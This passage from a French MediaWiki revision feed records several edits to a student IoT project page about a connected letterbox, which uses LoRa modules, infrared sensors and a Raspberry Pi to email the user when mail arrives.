* Finalisation du code pour la communication entre modules LoRa&lt;br /&gt;
* Création d'un programme en langage C pour le traitement des informations reçues par l'Arduino&lt;br /&gt;
* Mise en place d'un prototype&lt;br /&gt;
* Branchement du capteur de luminosité&lt;br /&gt;
* Création d'une interface web pour le choix de l'adresse mail et du corps du message envoyé&lt;br /&gt;
* Edition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 4===&lt;br /&gt;
* Optimisation du code des modules LoRa et du code C sur la raspberry&lt;br /&gt;
* montage final du prototype&lt;br /&gt;
* Suite de l'édition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 5===&lt;br /&gt;
* Automatisation du processus sur la Raspberry&lt;br /&gt;
* Connexion de la Raspberry en Wifi automatiquement au démarrage sur un téléphone en partage de connexion pour accès internet durant la démo&lt;br /&gt;
* Développement d'une petite application Android analogue à l'interface web, pour pouvoir régler l'adresse et le corps du message depuis son smartphone&lt;br /&gt;
&lt;br /&gt;
==Poster==&lt;br /&gt;
&lt;br /&gt;
[[Fichier:PosterGr2.png]]&lt;br /&gt;
&lt;br /&gt;
==Aperçus des applications==&lt;br /&gt;
&lt;br /&gt;
[[Fichier:web.png]]&lt;br /&gt;
&lt;br /&gt;
[[Fichier:appli.png]]&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37265</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37265"/>
				<updated>2017-01-15T14:54:54Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Séance 3 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:bal.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;br /&gt;
&lt;br /&gt;
===Séance 3===&lt;br /&gt;
* Finalisation du code pour la communication entre modules LoRa&lt;br /&gt;
* Création d'un programme en langage C pour le traitement des informations reçues par l'Arduino&lt;br /&gt;
* Mise en place d'un prototype&lt;br /&gt;
* Branchement du capteur de luminosité&lt;br /&gt;
* Création d'une interface web pour le choix de l'adresse mail et du corps du message envoyé&lt;br /&gt;
* Edition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 4===&lt;br /&gt;
* Optimisation du code des modules LoRa et du code C sur la raspberry&lt;br /&gt;
* montage final du prototype&lt;br /&gt;
* Suite de l'édition du poster A3&lt;br /&gt;
&lt;br /&gt;
===Séance 5===&lt;br /&gt;
* Automatisation du processus sur la Raspberry&lt;br /&gt;
* Connexion de la Raspberry en Wifi automatiquement au démarrage sur un téléphone en partage de connexion pour accès internet durant la démo&lt;br /&gt;
* Développement d'une petite application Android analogue à l'interface web, pour pouvoir régler l'adresse et le corps du message depuis son smartphone&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37264</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37264"/>
				<updated>2017-01-15T14:46:53Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Objectif du projet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:bal.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;br /&gt;
&lt;br /&gt;
===Séance 3===&lt;br /&gt;
* Finalisation du code pour la communication entre Arduinos&lt;br /&gt;
* Création d'un programme en langage C pour le traitement des informations reçues par l'Arduino&lt;br /&gt;
* Mise en place d'un prototype&lt;br /&gt;
* Création d'une interface web pour le choix de l'adresse mail et du corps du message envoyé&lt;br /&gt;
* Edition du poster A3&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Bal.png&amp;diff=37263</id>
		<title>Fichier:Bal.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Bal.png&amp;diff=37263"/>
				<updated>2017-01-15T14:46:31Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37262</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37262"/>
				<updated>2017-01-15T14:43:38Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT2.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;br /&gt;
&lt;br /&gt;
===Séance 3===&lt;br /&gt;
* Finalisation du code pour la communication entre Arduinos&lt;br /&gt;
* Création d'un programme en langage C pour le traitement des informations reçues par l'Arduino&lt;br /&gt;
* Mise en place d'un prototype&lt;br /&gt;
* Création d'une interface web pour le choix de l'adresse mail et du corps du message envoyé&lt;br /&gt;
* Edition du poster A3&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:IoT.png&amp;diff=37261</id>
		<title>Fichier:IoT.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:IoT.png&amp;diff=37261"/>
				<updated>2017-01-15T14:43:00Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : a téléversé une nouvelle version de « Fichier:IoT.png »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:IoT.png&amp;diff=37260</id>
		<title>Fichier:IoT.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:IoT.png&amp;diff=37260"/>
				<updated>2017-01-15T14:42:21Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : a téléversé une nouvelle version de « Fichier:IoT.png »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37107</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=37107"/>
				<updated>2017-01-10T07:43:33Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Matériel nécessaire */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IoT.png]]&lt;br /&gt;
&lt;br /&gt;
====Description du projet====&lt;br /&gt;
&lt;br /&gt;
Le module serait confectionné à la découpeuse laser du Fabricarium, et sera prévu pour s'insérer dans une BAL normalisée (26cmx26cmx34cm). Il sera équipé de plusieurs capteurs permettant de repérer l'insertion d'un courrier. Il y aura deux systèmes de détections :&lt;br /&gt;
* Un qui détectera l'ouverture de la trappe &lt;br /&gt;
* L'autre qui confirmera qu'il y a bien un courrier/colis dans la BAL.&lt;br /&gt;
&lt;br /&gt;
Dès qu'un objet sera inséré dans la BAL, le module enverra un signal à une Raspberry Pi, qui sera connectée au réseau du domicile de l'utilisateur, via le protocole LoRa. La raspberry enverra ensuite un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
====Matériel nécessaire====&lt;br /&gt;
&lt;br /&gt;
Pour ce projet, nous aurons besoin de :&lt;br /&gt;
* Un raspberry Pi &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Puce LoRa pour Raspberry &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* Module µ-controleur + antenne LoRa &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 LED infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 4 récepteurs infrarouges &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1 capteur de luminosité &amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt;[reçu]&amp;lt;/span&amp;gt; &lt;br /&gt;
* 1m de tube en pvc &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
* contreplaqué pour la découpe de la boîte &amp;lt;span style=&amp;quot;color:blue&amp;quot;&amp;gt;[Remboursé]&amp;lt;/span&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Étapes du projet==&lt;br /&gt;
&lt;br /&gt;
* Conception du circuit µ-controleur + LEDs&lt;br /&gt;
* Conception du boitier du module&lt;br /&gt;
* Communication Raspberry Pi et module via LoRa&lt;br /&gt;
* Envoi du mail d'avis de réception&lt;br /&gt;
* tests&lt;br /&gt;
&lt;br /&gt;
==Description technique du Projet==&lt;br /&gt;
&lt;br /&gt;
Notre objet connecté sera constitué de deux parties distinctes :&lt;br /&gt;
* Une raspberry connectée à Internet (potentiel routeur de l'utilisateur)&lt;br /&gt;
* Le module à insérer dans la BAL&lt;br /&gt;
&lt;br /&gt;
La raspberry aura pour fonction de recevoir, via un module LoRa connecté sur son port série, le signal du module signifiant qu'un courrier a été inséré dans la BAL. Une fois ce signal reçu, elle s'occupera d'envoyer un mail à l'utilisateur pour le prévenir.&lt;br /&gt;
&lt;br /&gt;
Le module dans la BAL sera constitué d'un module LoRa alimenté par une batterie, qui alimentera le capteur de luminosité, les différentes LED émettrices, et récupérera les valeurs en sorties des 4 récepteurs infrarouges. Tant que les récepteurs recevront un signal, le facteur ne sera pas passé. Mais lorsqu'un courrier sera inséré dans la BAL, le capteur de luminosité captera le la lumière passant par la fente de la BAL, et une ou plusieurs connections IR seront coupées. C'est à cet instant que le module LoRa enverra le signal de réception au récepteur connecté à la Raspberry.&lt;br /&gt;
&lt;br /&gt;
Si seul le capteur de luminosité reçoit de la lumière, et que les connections IR restent actives, cela signifiera que seule la fente a été ouverte, mais qu'aucun courrier n'a été livré.&lt;br /&gt;
&lt;br /&gt;
==Suivi de l'avancement du projet==&lt;br /&gt;
===Séance 1===&lt;br /&gt;
&lt;br /&gt;
* Définition du cahier des charges&lt;br /&gt;
* Définition du matériel nécessaires&lt;br /&gt;
* Premier Schéma du prototype&lt;br /&gt;
&lt;br /&gt;
===Séance 2===&lt;br /&gt;
&lt;br /&gt;
* Prise en main des modules LoRa (Adafruits feather m0)&lt;br /&gt;
* Configuration en mode transmetteur pour l'un, et récepteur pour l'autre&lt;br /&gt;
* Communication entre les deux&lt;br /&gt;
* Connexion de la Raspberry Pi à Internet&lt;br /&gt;
* Code pour l'envoi de mail&lt;br /&gt;
* Découpe des pièces du prototype à la découpeuse laser&lt;br /&gt;
* Etude de la pinmap des modules LoRa pour alimentation des LED infrarouges et récepteurs&lt;br /&gt;
* Réflexion quant aux modifications à apporter aux codes des modules LoRa pour l'application souhaitée&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36953</id>
		<title>Boîte aux lettres connectée</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Bo%C3%AEte_aux_lettres_connect%C3%A9e&amp;diff=36953"/>
				<updated>2017-01-05T16:50:01Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Étapes du projet */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
===Présentation générale du projet===&lt;br /&gt;
====Contexte====&lt;br /&gt;
&lt;br /&gt;
Dans le cadre du module IoT (Internet of Things), nous devons réaliser en 20 heures un prototype d'objet connecté. Cet objet connecté devra répondre à un certain besoin existant. Nous avons décidé de concevoir une boite aux lettres connectée.&lt;br /&gt;
&lt;br /&gt;
====Objectif du projet====&lt;br /&gt;
&lt;br /&gt;
Nous imaginons réaliser un module insérable dans une BAL qui permettrait de détecter la réception d'un courrier ou colis. L'utilisateur serait alors prévenu et cela lui éviterait un déplacement inutile.&lt;br /&gt;
&lt;br /&gt;
Voici un schéma montrant notre vision du prototype :&lt;br /&gt;
&lt;br /&gt;
